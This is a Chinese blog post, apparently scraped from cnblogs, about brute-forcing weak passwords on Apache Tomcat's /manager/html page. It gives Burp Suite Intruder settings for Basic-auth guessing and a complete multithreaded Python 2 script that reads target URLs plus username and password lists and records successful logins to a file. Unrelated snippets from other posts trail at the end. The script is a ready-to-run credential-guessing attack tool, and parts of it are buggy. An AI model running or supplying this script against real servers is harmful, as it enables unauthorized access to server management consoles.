WEB中间件--tomcat爆破,burp和python脚本

1.tomcat 用burpsuit进行弱口令爆破

先抓包

发送到inturder

payload type 选择custom iterater

第一个payload选用户名文件,第二个payload用 : 第三个选密码文件

设置base64加密,和去掉URL编码

开始攻击,得到用户名密码

2.用python脚本进行爆破

目前正在学习python,

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by.really
import sys
import requests
import threading
import Queue
import time
import base64
import os
#headers = {‘Content-Type‘: ‘application/x-www-form-urlencoded‘,‘User-Agent‘: ‘Googlebot/2.1 (+http://www.googlebot.com/bot.html)‘}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open(‘url.txt‘,‘r‘)
def urllist():
    for url in urls:
        url=url.rstrip()
        u.put(url)
def namelist():
    names=open(‘name.txt‘,‘r‘)
    for name in names:
        name=name.rstrip()
        n.put(name)

def passlist():
    passwds=open(‘pass.txt‘,‘r‘)
    for passwd in passwds:
        passwd=passwd.rstrip()
        p.put(passwd)

def weakpass(url):
    namelist()
    while not n.empty():
        name =n.get()
        #print name
        passlist()
        while not p.empty():
            good()
            #name = n.get()
            passwd = p.get()
            #print passwd
            headers = {‘Authorization‘: ‘Basic %s==‘ % (base64.b64encode(name+‘:‘+passwd))}
            try:
                r =requests.get(url,headers=headers,timeout=3)
                #print r.status_code
                if r.status_code==200:
                    print ‘[turn] ‘ +url+‘ ‘+name+‘:‘+passwd
                    f = open(‘good.txt‘,‘a+‘)
                    f.write(url+‘ ‘+name+‘:‘+passwd+‘\n‘)
                    f.close()
                else:
                    print ‘[false] ‘ + url+‘ ‘+name+‘:‘+passwd
            except:
                print ‘[false] ‘  + url+‘ ‘+name+‘:‘+passwd

def list():
    while u.empty():
        url = u.get()
        weakpass(name,url)

def thread():
    urllist()
    tsk=[]
    for i in open(‘url.txt‘).read().split(‘\n‘):
        i = i + ‘/manager/html‘
        t = threading.Thread(target=weakpass,args=(i,))
        tsk.append(t)
    for t in tsk:
        t.start()
        t.join(1)
        #print "current has %d threads" % (threading.activeCount() - 1)
def good():
    good_ = 0
    for i in open(‘good.txt‘).read().split(‘\n‘):
        good_+=1
    os.system(‘title "weakpass------good:%s"‘ % (good_))

if __name__=="__main__":
   # alllist()
    thread()

原文地址:https://www.cnblogs.com/hackxf/p/8949710.html

时间: 2024-12-17 17:55:31

WEB中间件--tomcat爆破,burp和python脚本的相关文章

一句话爆破速度提升一千倍python脚本

这个脚本是接地提供的思路,一句话爆破速度提升一千倍,看了他的帖子然而没有看到工具,思路很牛逼,我提供一个Python脚本 本地测试了下,十万密码只需要3秒,速度还是可以的 # coding:utf-8 # __author__ : learn import threading,Queue,requests class Add_password: def __init__(self,dictname,queue): self.dictname = dictname self.queue = que

linux+php+apache web调用python脚本权限问题解决方案

lamp : linux + apache + mysql + php 在上篇随笔中linux+php+apache调用python脚本时出现的问题的根本原因是:apache运行时使用的apache用户权限不够: 由此想到的解决方案是将apache改用root用户来执行,修改/etc/httpd/conf/httpd.conf,但结果是apache运行不起来,初步 判断是apache出于安全方面的考虑,不允许使用root用户运行(此判断是否正确有待验证). 具体解决方案(验证通过): 在sudo

转 : JBoss Web和 Tomcat的区别

JBoss Web和 Tomcat的区别 在Web2.0的浪潮中,各种页面技术和框架不断涌现,为服务器端的基础架构提出了更高的稳定性和可扩展性的要求.近年来,作为开源中间件的全 球领导者,JBoss在J2EE应用服务器领域已成为发展最为迅速的应用服务器.在市场占有率和服务满意度上取得了巨大的成功,丝毫不逊色于其它的非开源 竞争对手,如WebSphere.WebLogic.Application Server.JBoss Web的诸多优越性能,正是其广为流行的原因. 基于Tomcat内核,青胜于蓝

【转】JBoss Web和 Tomcat的区别

转载于:http://www.verydemo.com/demo_c202_i780.html JBoss Web和 Tomcat的区别 在Web2.0的浪潮中,各种页面技术和框架不断涌现,为服务器端的基础架构提出了更高的稳定性和可扩展性的要求.近年来,作为开源中间件的全 球领导者,JBoss在J2EE应用服务器领域已成为发展最为迅速的应用服务器.在市场占有率和服务满意度上取得了巨大的成功,丝毫不逊色于其它的非开源 竞争对手,如WebSphere.WebLogic.Application Ser

用 Python 脚本实现对 Linux 服务器的监控

hon 分享到:8 原文出处: 曹江华 目前 Linux 下有一些使用 Python 语言编写的 Linux 系统监控工具 比如 inotify-sync(文件系统安全监控软件).glances(资源监控工具)在实际工作中,Linux 系统管理员可以根据自己使用的服务器的具体情况编写一下简单实用的脚本实现对 Linux 服务器的监控. 本文介绍一下使用 Python 脚本实现对 Linux 服务器 CPU 内存 网络的监控脚本的编写. Python 版本说明 Python 是由 Guido va

某互联网后台自动化组合测试框架RF+Sikuli+Python脚本

某互联网后台自动化组合测试框架RF+Sikuli+Python脚本 http://www.jianshu.com/p/b3e204c8651a 字数949 阅读323 评论1 喜欢0 一.**RobotFramework 1.**工具介绍:Robotframework在测试中作为组织测试用例和BDD关键字的平台,主要使用RIDE进行管理,它不是一个工具,而仅仅是一个框架,使用Python进行开发,同时支持WEB测试(Selenium).Java GUI 测试,启动线程.终端.SSH等.支持BDD

PHP 调用Python脚本

上次做用户反馈自动翻译,写了个python脚本,将日文的用户反馈翻译成中文,效果虽然可以,但其它不懂python的童鞋就没法使用了,所以搭了个web服务,让其他人可以通过网页访问查询.使用的是apache服务,具体环境(LAMP)搭建就不细说,主要分享php调用python脚本后台运行的处理. 1. PHP如何调用外部程序 首先要解决的问题就是php如何调用python脚本,在PHP中调用外部程序主要有两个函数,system和exec. system()原型:string system(stri

Zabbix3.2邮件告警python脚本

一.概述及环境要求 1.概述 zabbix监控也起到重要作用,以下是使用python脚本发送告警邮件配置方法.之前使用过sendemail邮件报警但是发现邮件主题为中文时候会出现乱码的问题. 2.环境安装要求 Zabbix软件版本:zabbix3.2.6 操作系统:CentOS release 6.8 (Final) 二.脚本创建及测试 1.查看配置zabbix_server.conf ,找到AlertScriptsPath,查看路径位置,如被注释,将注释打开,把send.py 文件保存到该目录

Python ----脚本CGI、特点、应用、开发环境

CGI CGI 目前由NCSA维护,NCSA定义CGI如下: CGI(Common Gateway Interface),通用网关接口,它是一段程序,运行在服务器上如:HTTP服务器,提供同客户端HTML页面的接口. CGI程序可以是Python脚本.Perl脚本.Shell脚本.C或者C++程序等. 服务器 在你进行CGI编程前,确保您的Web服务器支持CGI及已经配置了CGI的处理程序. 所有的HTTP服务器执行CGI程序都保存在一个预先配置的目录.这个目录被称为CGI目录,并按照惯例,它被